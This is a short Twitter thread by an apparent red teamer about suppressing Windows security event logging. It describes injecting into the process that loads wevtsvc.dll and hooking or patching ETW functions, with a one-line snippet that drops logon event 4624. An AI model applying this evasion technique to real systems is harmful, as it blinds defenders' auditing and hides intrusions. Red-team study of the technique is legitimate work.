For all windows internals people -- anyone know which windows processes are commonly responsible for event tracing (using evntprov.h)? I'd like to hook EventWriteTransfer as a means of surgically suppressing certain event logging during red team scenarios. 1/?
1
0
0
For example, could it be as easy as identifying the target process, injecting your dll, using detours to set the hook with the added logic "if(EventDescriptor->Id == 4624){ return ERROR_SUCCESS; }"? 2/?
1
0
0
I suppose my question is this: does anyone know which process is commonly responsible for the Microsoft-Windows-Security-Auditing event tracing provider?
1
0
0
ANSWER: I found out how to do what I wanted. Here's an awesome article by @_batsec_ blog.dylan.codes/pwning-wind… It turns out that you can just check every process for whether it contains the module wevtsvc.dll. Then you inject into that process and patch EtwEventCallback 5/?
9:36 PM · Jan 14, 2021
1
4
8

